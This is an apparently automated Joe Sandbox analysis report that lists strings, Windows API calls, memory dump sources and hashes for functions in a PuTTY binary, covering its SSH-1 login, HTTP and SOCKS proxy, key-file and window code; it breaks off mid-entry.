                    • Sent username "%s", xrefs: 00C0597A
                    • SSH-1 public keys were badly formatted, xrefs: 00C05458
                    • Received TIS challenge, xrefs: 00C0697B
                    • Trying to enable encryption..., xrefs: 00C05805
                    • No supported ciphers found, xrefs: 00C05BDA
                    • Received CryptoCard challenge, xrefs: 00C06B8B
                    • Encrypted session key, xrefs: 00C0562C
                    • Using Blowfish encryption, xrefs: 00C05773
                    • Access denied, xrefs: 00C06FDE
                    • Key refused, xrefs: 00C063DF
                    • Server's RSA challenge was badly formatted, xrefs: 00C06474
                    • Authenticated using RSA key "%.*s" from agent, xrefs: 00C063BF
                    • Authentication refused, xrefs: 00C06FF5
                    • No reply received from Pageant, xrefs: 00C06425
                    • Using 3DES encryption, xrefs: 00C05758
                    • TIS authentication declined, xrefs: 00C06915
                    • Received unexpected packet in response to TIS authentication, type %d (%s), xrefs: 00C07232
                    • Sending password with camouflage packets, xrefs: 00C06ED3
                    • CryptoCard authentication response: , xrefs: 00C06C78
                    • SSH-1 public key encryptions failed due to bad formatting, xrefs: 00C0572E
                    • Key file contains public key only, xrefs: 00C05A70
                    • cipher, xrefs: 00C05C00
                    • -- End of CryptoCard authentication challenge from server: -------------------, xrefs: 00C06C6A
                    • -- TIS authentication challenge from server: ---------------------------------, xrefs: 00C069D1
                    • SSH CryptoCard authentication, xrefs: 00C06BBB
                    • Pageant failed to answer challenge, xrefs: 00C06401
                    • Requested TIS authentication, xrefs: 00C0689B
                    • TIS authentication response: , xrefs: 00C06A66, 00C06CA1
                    • %s@%s's password: , xrefs: 00C06CFD
                    • Authentication successful, xrefs: 00C070D3
                    • Trying public key "%s", xrefs: 00C06048
                    • Encryption not successfully enabled, xrefs: 00C05AA4
                    • Passphrase for key "%s": , xrefs: 00C064D7
                    • Sending length-padded password, xrefs: 00C06DAC
                    • Sending Pageant's response, xrefs: 00C062E9
                    • Public key packet not received, xrefs: 00C053E8
                    • Pageant's response not accepted, xrefs: 00C063FA
                    • TIS authentication refused., xrefs: 00C0693E
                    • Bad SSH-1 public key packet, xrefs: 00C05393
                    • Unable to use this key file (%s), xrefs: 00C05B0D
                    • AES not supported in SSH-1, skipping, xrefs: 00C056A8
                    • Pageant's response accepted, xrefs: 00C06375
                    • Server refused to enable compression, xrefs: 00C0718E
                    • Sent username "%s", xrefs: 00C05938
                    • username prompt, xrefs: 00C05204
                    • login as: , xrefs: 00C05AE0
                    • Sent password, xrefs: 00C06F51
                    • Received unexpected packet in response to compression request, type %d (%s), xrefs: 00C07298
                    • Pageant is running. Requesting keys., xrefs: 00C05C93
                    • Received unexpected packet in response to offer of public key, type %d (%s), xrefs: 00C07258
                    • password prompt, xrefs: 00C0721C
                    • Configured key file not in Pageant, xrefs: 00C05F7E
                    • cipher warning, xrefs: 00C05259
                    • SSH TIS authentication, xrefs: 00C069AB
                    • 3DES, xrefs: 00C05682
                    • Wrong passphrase., xrefs: 00C0647E
                    • Failed to authenticate with our public key., xrefs: 00C0683F
                    • Trying public key authentication., xrefs: 00C06025
                    • pwlen >= bottom && pwlen <= top, xrefs: 00C06EBE
                    • Unable to load key file "%s" (%s), xrefs: 00C05B85
                    • TIS challenge packet was badly formed, xrefs: 00C07278
                    • rsa, xrefs: 00C054F4
                    • Reading key file "%s", xrefs: 00C05A05
                    • Server refused to compress, xrefs: 00C071A7
                    • SSH login name, xrefs: 00C05ACA
                    • CryptoCard authentication refused., xrefs: 00C06B4B
                    • SSH password, xrefs: 00C06CE1
                    • single-DES, xrefs: 00C056D0
                    • Requested CryptoCard authentication, xrefs: 00C06AB8
                    • false && "unexpected return from rsa1_load_f()", xrefs: 00C072BA
                    • Received unexpected packet in response to RSA authentication, type %d (%s), xrefs: 00C07245
                    • Pageant has %zu SSH-1 keys, xrefs: 00C05F14
                    • Blowfish, xrefs: 00C0569C
                    • CryptoCard challenge packet was badly formed, xrefs: 00C07282
                    • Using single-DES encryption, xrefs: 00C0576C, 00C05778
                    • Authentication was trivial! Abandoning session as specified in configuration., xrefs: 00C070C9
                    • -- End of TIS authentication challenge from server: --------------------------, xrefs: 00C06A58
                    • -- CryptoCard authentication challenge from server: --------------------------, xrefs: 00C06BDF
                    • No supported authentication methods available, xrefs: 00C071E2
                    • %s, xrefs: 00C05341
                    • Trying Pageant key #%zu, xrefs: 00C0611E
                    • SSH key passphrase, xrefs: 00C064BE
                    • Pageant key #%zu matches configured key file, xrefs: 00C060D8
                    • Received RSA challenge, xrefs: 00C061B0
                    • Received public keys, xrefs: 00C0529E
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/login1.c, xrefs: 00C06EB9, 00C072B5
                    • CryptoCard authentication declined, xrefs: 00C06B32
                    • Successfully started encryption, xrefs: 00C058CD
                    • Server violates SSH-1 protocol by not supporting 3DES encryption, xrefs: 00C0571E
                    • Host key fingerprint is:, xrefs: 00C05323
                    • Unable to use key file "%s" (%s), xrefs: 00C05B3E
                    • No passphrase required., xrefs: 00C06088
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s$%s@%s's password: $-- CryptoCard authentication challenge from server: --------------------------$-- End of CryptoCard authentication challenge from server: -------------------$-- End of TIS authentication challenge from server: --------------------------$-- TIS authentication challenge from server: ---------------------------------$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/login1.c$3DES$AES not supported in SSH-1, skipping$Access denied$Authenticated using RSA key "%.*s" from agent$Authentication refused$Authentication successful$Authentication was trivial! Abandoning session as specified in configuration.$Bad SSH-1 public key packet$Blowfish$Configured key file not in Pageant$Couldn't load private key from %s (%s).$CryptoCard authentication declined$CryptoCard authentication refused.$CryptoCard authentication response: $CryptoCard challenge packet was badly formed$Encrypted session key$Encryption not successfully enabled$Failed to authenticate with our public key.$Failed to get reply from Pageant$Host key fingerprint is:$Key file contains public key only$Key refused$No passphrase required.$No reply received from Pageant$No supported authentication methods available$No supported ciphers found$Pageant failed to answer challenge$Pageant has %zu SSH-1 keys$Pageant is running. Requesting keys.$Pageant key #%zu matches configured key file$Pageant's response accepted$Pageant's response not accepted$Pageant's response was truncated$Passphrase for key "%s": $Public key packet not received$Reading key file "%s"$Received CryptoCard challenge$Received RSA challenge$Received TIS challenge$Received public keys$Received unexpected packet in response to RSA authentication, type %d (%s)$Received unexpected packet in response to TIS authentication, type %d (%s)$Received unexpected packet in response to compression request, type %d (%s)$Received unexpected packet in response to offer of public key, type %d (%s)$Received unexpected packet in response to password authentication, type %d (%s)$Requested CryptoCard authentication$Requested TIS authentication$Requesting compression$SSH CryptoCard authentication$SSH TIS authentication$SSH key passphrase$SSH login name$SSH password$SSH-1 public key encryptions failed due to bad formatting$SSH-1 public keys were badly formatted$Sending Pageant's response$Sending length-padded password$Sending password with camouflage packets$Sending unpadded password$Sent password$Sent username "%s"$Sent username "%s"$Server refused our public key.$Server refused to compress$Server refused to enable compression$Server violates SSH-1 protocol by not supporting 3DES encryption$Server's RSA challenge was badly formatted$Successfully started encryption$TIS authentication declined$TIS authentication refused.$TIS authentication response: $TIS challenge packet was badly formed$Trying Pageant key #%zu$Trying public key "%s"$Trying public key authentication.$Trying to enable encryption...$Unable to load key (%s)$Unable to load key file "%s" (%s)$Unable to use key file "%s" (%s)$Unable to use this key file (%s)$Using 3DES encryption$Using Blowfish encryption$Using single-DES encryption$Wrong passphrase.$cipher$cipher warning$false && "unexpected return from rsa1_load_f()"$host key verification$login as: $passphrase prompt$password prompt$pwlen >= bottom && pwlen <= top$rsa$single-DES$username prompt
                    • API String ID: 0-2807467633
                    • Opcode ID: 1daa5a5200e61a72bfcaf528b72f1632f581c29f5d58ffdbaa4f59c3bafbfe5a
                    • Instruction ID: b6a6b8dae54e368eb66874bb18a7bdff9406f887be2b1efe3f2d941d506d48c9
                    • Opcode Fuzzy Hash: 1daa5a5200e61a72bfcaf528b72f1632f581c29f5d58ffdbaa4f59c3bafbfe5a
                    • Instruction Fuzzy Hash: 1E13B6B5900644AFDF20AF54EC46FAA7794AF14308F0444B4FD4D9B293E772DA18DBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB4877 Relevance: 124.9, APIs: 52, Strings: 19, Instructions: 698windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$Append$Create$Window$Rect$CapsClientDevice$BitmapCaretClickDeleteDesktopDoubleErrorInfoLastPopupReleaseScrollSystemTime
                    • String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
                    • API String ID: 662650409-3590547323
                    • Opcode ID: e8a638c9d8254bb03fb4efe402e14481ee6f59e852953b2d9a39d9f2722eb03c
                    • Instruction ID: 708b298356b55eb0ba81a9662d077b7aba1053490eb44afd61ae1bcf89e37bc3
                    • Opcode Fuzzy Hash: e8a638c9d8254bb03fb4efe402e14481ee6f59e852953b2d9a39d9f2722eb03c
                    • Instruction Fuzzy Hash: 6632F7B1540301AFE711AF20EC5AFAE3BE4FB45749F540168FA06B72F1EBB1A8148B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C20FC0 Relevance: 90.5, APIs: 4, Strings: 47, Instructions: 1281COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %s:%d$Basic$CONNECT$CONNECT %s HTTP/1.1Host: %s$Content-Length$Digest$Digest authentication not supported$Digest hash algorithm '%s' not recognised$Digest hash algorithm '%s' not supported$HTTP proxy authentication$HTTP proxy requested authentication which we do not have$HTTP response %s$HTTP response was absent or malformed$HTTP/%d.%d %n%d$Missing CRLF after chunk during HTTP chunked transfer encoding$Proxy password: $Proxy username: $Proxy-Authenticate$Proxy-Authorization: Basic $Proxy-Authorization: Digest $Proxy-Connection$Received bad character 0x%02X in chunk length during HTTP chunked transfer encoding$Transfer-Encoding$algorithm$auth$authentication type '%s' not supported$chunked$close$keep-alive$no Proxy-Authorization header seen in HTTP 407 Proxy Authentication Required response$nonce$opaque$parse error$parse error in Digest algorithm field$parse error in Digest header$parse error in Digest nonce field$parse error in Digest opaque field$parse error in Digest qop field$parse error in Digest realm field$parse error in Digest stale field$parse error in Digest userhash field$qop$quality-of-protection type '%s' not supported$realm$stale$true$userhash
                    • API String ID: 4218353326-1494668594
                    • Opcode ID: c654744e9d929410795b3dea608aa90334975852ffd48159481bde061ab1b26b
                    • Instruction ID: c81a84ff6301d19d60e63b94f7506ed8570282b975e994a287645e96f45e7fe1
                    • Opcode Fuzzy Hash: c654744e9d929410795b3dea608aa90334975852ffd48159481bde061ab1b26b
                    • Instruction Fuzzy Hash: DAA244B5A00210AFDF10DF10EC85B2A77E1AF64314F084568FC599B7A2E732EE55DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C202F0 Relevance: 70.9, APIs: 4, Strings: 36, Instructions: 876COMMON
                    Download Yara Rule
                    Strings
                    • SOCKS proxy failed to connect, error %d (%s), xrefs: 00C208EF
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/proxy/socks5.c, xrefs: 00C20B62, 00C20C00, 00C20E5D
                    • SOCKS server sent unrecognised error code %d, xrefs: 00C20462
                    • SOCKS 5 CHAP reply had version number %d (expected %d), xrefs: 00C20C5D
                    • SOCKS proxy response contained reply version number %d (expected 0), xrefs: 00C203D6
                    • SOCKS 5 password reply had version number %d (expected %d), xrefs: 00C20BD8
                    • SOCKS 5 authentication cannot support passwords longer than 255 chars, xrefs: 00C20BF4
                    • unknown, xrefs: 00C207CE, 00C207DE, 00C208B7, 00C208ED
                    • socks5_chap_available, xrefs: 00C20B67
                    • SOCKS proxy authentication, xrefs: 00C20888
                    • connection refused, xrefs: 00C208D3
                    • SOCKS 5 cannot support host names longer than 255 chars, xrefs: 00C20E06
                    • SOCKS proxy response included unknown address type %d, xrefs: 00C20930
                    • SOCKS 5 CHAP authentication failed, xrefs: 00C20CF8
                    • SOCKS 5 server rejected our password, xrefs: 00C20B23
                    • network unreachable, xrefs: 00C208C5
                    • SOCKS version 4 does not support IPv6, xrefs: 00C2045A
                    • false && "Unexpected addrtype in SOCKS 5 proxy", xrefs: 00C20E62
                    • SOCKS server reported failure to connect, xrefs: 00C2046C
                    • Proxy username: , xrefs: 00C20951
                    • unspecified failure, xrefs: 00C20636
                    • SOCKS server asked for auth method %d (%s), which we did not offer, xrefs: 00C207E3
                    • command not supported, xrefs: 00C208E1
                    • SOCKS 5 CHAP authentication cannot support usernames longer than 255 chars, xrefs: 00C20BCE
                    • TTL expired, xrefs: 00C208DA
                    • SOCKS server wanted IDENTD on client, xrefs: 00C20473
                    • address type not supported, xrefs: 00C208E8
                    • SOCKS server rejected every authentication method we offered, xrefs: 00C20835
                    • SOCKS 5 authentication cannot support usernames longer than 255 chars, xrefs: 00C20BED
                    • host unreachable, xrefs: 00C208CC
                    • false && "bad auth method in SOCKS 5 negotiation", xrefs: 00C20C05
                    • SOCKS proxy returned unexpected reply version %d (expected %d), xrefs: 00C207FB
                    • Username and IDENTD on client don't agree, xrefs: 00C2047A
                    • SOCKS 5 CHAP reply sent no attributes, xrefs: 00C20C4B
                    • Proxy password: , xrefs: 00C20996
                    • connection not allowed by ruleset, xrefs: 00C208BE
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/proxy/socks5.c$Proxy password: $Proxy username: $SOCKS 5 CHAP authentication cannot support usernames longer than 255 chars$SOCKS 5 CHAP authentication failed$SOCKS 5 CHAP reply had version number %d (expected %d)$SOCKS 5 CHAP reply sent no attributes$SOCKS 5 authentication cannot support passwords longer than 255 chars$SOCKS 5 authentication cannot support usernames longer than 255 chars$SOCKS 5 cannot support host names longer than 255 chars$SOCKS 5 password reply had version number %d (expected %d)$SOCKS 5 server rejected our password$SOCKS proxy authentication$SOCKS proxy failed to connect, error %d (%s)$SOCKS proxy response contained reply version number %d (expected 0)$SOCKS proxy response included unknown address type %d$SOCKS proxy returned unexpected reply version %d (expected %d)$SOCKS server asked for auth method %d (%s), which we did not offer$SOCKS server rejected every authentication method we offered$SOCKS server reported failure to connect$SOCKS server sent unrecognised error code %d$SOCKS server wanted IDENTD on client$SOCKS version 4 does not support IPv6$TTL expired$Username and IDENTD on client don't agree$address type not supported$command not supported$connection not allowed by ruleset$connection refused$false && "Unexpected addrtype in SOCKS 5 proxy"$false && "bad auth method in SOCKS 5 negotiation"$host unreachable$network unreachable$socks5_chap_available$unknown$unspecified failure
                    • API String ID: 0-1022632183
                    • Opcode ID: 4c8cd06beb50d9c9c06ee4c137ca565b3c949e216994c4e4b00ff64c90a55118
                    • Instruction ID: 9af793e6bc1e1256c99c148e8a779e8c03a2a199dcc65c5d1e5b5ad8829c0669
                    • Opcode Fuzzy Hash: 4c8cd06beb50d9c9c06ee4c137ca565b3c949e216994c4e4b00ff64c90a55118
                    • Instruction Fuzzy Hash: F7526BB5900250ABDB20AF11FC42F6A77E4AF01309F284576FD585E693E731DA54CBA3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C12620 Relevance: 55.0, APIs: 2, Strings: 29, Instructions: 746COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %02x$Argon2-Memory$Argon2-Parallelism$Argon2-Passes$Argon2-Salt$Argon2d$Argon2i$Argon2id$Comm$Encryption$Key-Derivation$MAC failed$Private-Hash$Private-Lines$Private-MAC$PuTTY key format too new$PuTTY-User-Key-File-$PuTTY-User-Key-File-1$PuTTY-User-Key-File-2$PuTTY-User-Key-File-3$Public-Lines$aes256-cbc$createkey failed$ent$file format error$no header line found in key file$none$not a PuTTY SSH-2 private key$wrong passphrase
                    • API String ID: 4218353326-2268154444
                    • Opcode ID: cc7bebf8eb708b3d88b21ad6838731fc8557e467234e39f2e46c24c79b6d0424
                    • Instruction ID: 722acecba17f967223a70dd0332f30300e0e44af35909947184dced46e4335bb
                    • Opcode Fuzzy Hash: cc7bebf8eb708b3d88b21ad6838731fc8557e467234e39f2e46c24c79b6d0424
                    • Instruction Fuzzy Hash: 804239B59043405BDB20AF60DC42BEF77E1AF86304F04482CF98997252EB75DA99E793
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD0660 Relevance: 54.1, APIs: 12, Strings: 18, Instructions: 1584COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: !ctrl->delay_taborder$!dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$BUTTON$COMBOBOX$EDIT$LISTBOX$STATIC$false && "bad control type in winctrl_layout"$i < ntabdelays$ncols <= lenof(columns)$nshortcuts < MAX_SHORTCUTS_PER_CTRL$ntabdelays < lenof(tabdelays)$ret == c$thisc$ud$win
                    • API String ID: 4218353326-3405042439
                    • Opcode ID: 019e2657382eb087d3f5a55bf2ef7c31b8381b3802d283bb7ab120e38e648b84
                    • Instruction ID: c4687cbb02708cad104e61c8228ae74883bf8c726e745b45011e725379f58140
                    • Opcode Fuzzy Hash: 019e2657382eb087d3f5a55bf2ef7c31b8381b3802d283bb7ab120e38e648b84
                    • Instruction Fuzzy Hash: 18C2CF71A08301AFD720DF18CC81B6AF7E5EF85704F04496EF9899B392E771A954CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB88D0 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1097COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Color$ModeObjectSelectText
                    • String ID: $
                    • API String ID: 3594386986-3993045852
                    • Opcode ID: 2f0cc38a96d276b7514855e1aeaafcdb57710fee5e47912f96fcf5fe74d7cc7c
                    • Instruction ID: f6865375474fd7ff013ac69b876085d8a892b068467109fdd16496c896e0ff71
                    • Opcode Fuzzy Hash: 2f0cc38a96d276b7514855e1aeaafcdb57710fee5e47912f96fcf5fe74d7cc7c
                    • Instruction Fuzzy Hash: EA92F171A083019FDB24CF14CC91BBEBBE5FB84304F19866DF986972A1DBB59844DB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE6250 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 267networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00BE62F6
                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00BE630F
                    • _strncpy.LIBCMT ref: 00BE6330
                    • setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000001,00000004), ref: 00BE635D
                    • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00BE64D3
                    • htons.WS2_32(?), ref: 00BE6528
                    • bind.WS2_32(00000000,00000001,00000010), ref: 00BE6565
                    • listen.WS2_32(00000000,7FFFFFFF), ref: 00BE6576
                    • closesocket.WS2_32(00000000), ref: 00BE6593
                    • WSAGetLastError.WS2_32 ref: 00BE65BA
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/network.c, xrefs: 00BE664F
                    • false && "bad address family in sk_newlistener_internal", xrefs: 00BE6654
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorHandleInformationLast_strncpybindclosesocketgetaddrinfohtonslistensetsockoptsocket
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                    • API String ID: 1644184481-952207300
                    • Opcode ID: d5ef2cc4332422962b2c76610a38e818d6fb304936367beaa6ca85dfb0782711
                    • Instruction ID: 70a83804bce18ce3d1d0b0e6e360f14fef8d8586ae11932d120fe955916024c8
                    • Opcode Fuzzy Hash: d5ef2cc4332422962b2c76610a38e818d6fb304936367beaa6ca85dfb0782711
                    • Instruction Fuzzy Hash: 97B16AB05083809FE3249F25D859B5BBBF4FFA4354F144A5CE48A8B2A1DB79D848CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD50A0 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 287COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BD50F9
                      • Part of subcall function 00BD5470: _strlen.LIBCMT ref: 00BD549D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: LocalTime_strftime_strlen
                    • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                    • API String ID: 4241967358-2889948183
                    • Opcode ID: 41c74728c12655e7cd80873666fcc46cf4b44f68762b512d71469509efa97357
                    • Instruction ID: 7920ca8a0bc20286dccee30c97676955570a08d2fe9f4abb0164a0710492055b
                    • Opcode Fuzzy Hash: 41c74728c12655e7cd80873666fcc46cf4b44f68762b512d71469509efa97357
                    • Instruction Fuzzy Hash: DDA10471A09B409BCB34AA14D895BBFF3E5EFC5305F44446EE88987305F671A844CB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCE0F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 262windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowTextA.USER32(?,00000000), ref: 00BCE137
                    • SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00CB0020), ref: 00BCE158
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BCE184
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BCE1DB
                    • GetParent.USER32(?), ref: 00BCE202
                    • SetActiveWindow.USER32(00000000), ref: 00BCE209
                    • DestroyWindow.USER32(?), ref: 00BCE210
                    • SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 00BCE24F
                    • SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 00BCE27F
                    • _strlen.LIBCMT ref: 00BCE2C6
                    • MessageBeep.USER32(00000000), ref: 00BCE2F5
                    • _strlen.LIBCMT ref: 00BCE35E
                    • SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 00BCE431
                    Strings
                    Memory Dump Source
